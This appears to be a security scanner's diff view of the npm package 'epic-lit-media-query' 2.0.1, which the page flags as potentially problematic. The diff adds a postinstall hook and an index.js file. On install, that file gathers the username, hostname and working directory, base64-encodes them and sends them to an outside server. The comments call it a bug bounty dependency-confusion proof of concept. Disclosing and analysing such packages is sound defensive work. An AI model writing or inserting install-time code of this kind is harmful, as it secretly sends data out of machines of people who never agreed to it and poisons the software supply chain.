epic-lit-media-query 2.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of epic-lit-media-query might be problematic. Click here for more details.
- package/index.js +33 -0
- package/package.json +22 -0
package/index.js
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
|
|
4
|
+
// This is a proof-of-concept package that is part of a Bug Bounty compaign for Epic Games
|
|
5
|
+
// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
|
|
6
|
+
// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
|
|
7
|
+
// For any inquiries please reach out to: thelastninja@wearehackerone.com
|
|
8
|
+
|
|
9
|
+
async function sendUserInfoToLogging() {
|
|
10
|
+
try {
|
|
11
|
+
const userInfo = os.userInfo();
|
|
12
|
+
const hostname = os.hostname();
|
|
13
|
+
const currentPath = process.cwd();
|
|
14
|
+
|
|
15
|
+
// Combine user and host information
|
|
16
|
+
const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
|
|
17
|
+
|
|
18
|
+
// Base64 encode the combined string
|
|
19
|
+
const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
|
|
20
|
+
|
|
21
|
+
// Construct the URL with encoded user information
|
|
22
|
+
const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
|
|
23
|
+
|
|
24
|
+
// Send a GET request to the logging endpoint
|
|
25
|
+
const response = await http.get(url);
|
|
26
|
+
|
|
27
|
+
} catch (error) {
|
|
28
|
+
console.error('Error sending user info to logging:', error.message);
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
|
|
32
|
+
// Call the function to send user info to logging
|
|
33
|
+
sendUserInfoToLogging();
|
package/package.json
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "epic-lit-media-query",
|
|
3
|
+
"version": "2.0.1",
|
|
4
|
+
"description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"postinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"repository": {},
|
|
11
|
+
"keywords": [
|
|
12
|
+
"poc"
|
|
13
|
+
],
|
|
14
|
+
"author": "thelastninja@wearehackerone.com",
|
|
15
|
+
"license": "MIT",
|
|
16
|
+
"bugs": {
|
|
17
|
+
"url": "https://hackerone.com/thelastninja"
|
|
18
|
+
},
|
|
19
|
+
"homepage": "https://hackerone.com/thelastninja",
|
|
20
|
+
"dependencies": {
|
|
21
|
+
}
|
|
22
|
+
}
|